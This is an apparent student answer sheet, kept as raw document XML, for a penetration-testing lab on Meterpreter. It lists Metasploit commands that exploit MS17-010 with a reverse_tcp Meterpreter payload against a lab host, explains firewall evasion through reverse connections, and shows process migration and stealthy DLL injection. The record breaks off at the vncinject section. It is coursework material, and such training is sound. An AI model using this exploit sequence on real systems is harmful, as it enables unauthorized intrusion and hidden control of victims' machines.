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Lab 6: Meterpreter and vncinject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1. Meterpreter Basics.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">1.1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">a) Core Networking, File and Printer Sharing, HomeGroup.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="3813175"/>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510" cy="38131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ab/>
        <w:tab/>
        <w:t xml:space="preserve">b) Microsoft Security Bulletin MS17-010</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ab/>
        <w:t xml:space="preserve">1.2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">a) No</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">b) Because we used “bind_tcp”, which waits for the TCP connection from the attacker machine to the victim machine, and then loads the stage. However the firewall blocked the connection from the attacker, hence we did not establish the session because there was no connection from the attacker machine (TCP port 4444) to the victim machine (TCP port 445).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">1.3)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">a) </w:t>
        <w:tab/>
        <w:t xml:space="preserve">sudo service postgresql start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">sudo msfdb init</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">sudo msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">search ms17-010</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">info 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">use 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">show payloads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000015">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">set payload windows/x64/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">show options</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">set rhost 192.168.1.101</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">b) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="6313805"/>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ab/>
        <w:tab/>
        <w:t xml:space="preserve">c) Because we used the payload “windows/x64/meterpreter/reverse_tcp”, which establishes a connection in reverse, from victim to attacker, instead of waiting for one that gets blocked by a firewall.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">1.4) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="6313805"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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ab/>
        <w:t xml:space="preserve">1.5)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">a) Yes, because the attacker’s connection was not blocked by the firewall this time, and we were able to establish a session.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">b) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="6313805"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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ab/>
        <w:tab/>
        <w:t xml:space="preserve">c) </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Local Address: 192.168.1.103</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Local Port: 39181</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Peer Address: 192.168.1.101</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Peer Port: 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="6313805"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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2. Meterpreter In Depth.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000028">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">2.1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000029">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">a) getpid</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">b) 3764</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="2676525" cy="1000125"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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6765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ab/>
        <w:t xml:space="preserve">2.2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">a) ps</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">b) spoolsv.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="5066665"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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510" cy="506666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ab/>
        <w:tab/>
        <w:t xml:space="preserve">c) NT AUTHORITY\SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">2.3)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000032">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">a) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="6313805"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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ab/>
        <w:tab/>
        <w:t xml:space="preserve">b) Yes, with the addition of tasklist.exe because we just ran the tasklist command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">2.4)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000035">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">a) Yes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000036">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">b) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Because DLL Injection is a hacking technique that injects a payload into an existing process as a DLL, and thus enables the payload to run. The key advantage of this technique is 'being stealthy', so the process occurs under the default system as a user. It resides in memory and doesn’t use any disk file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000037">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">2.5)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000038">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">a) No</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000039">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">b) Because the process spoolsv.exe only captures data that is cached into memory when windows needs to print. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">2.6)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">a) ps -S explorer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">b) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="6313805"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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2876</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">c) EH21-W7-1978416\admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">2.7)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000040">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">a) migrate 2876</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000041">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">b) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="6313805"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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ab/>
        <w:t xml:space="preserve">2.8)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000043">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">a) Yes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">b) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="6313805"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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ab/>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3. vncinject</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">3.1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000049">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">a) </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Search ms17-010</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004A">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use 2 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
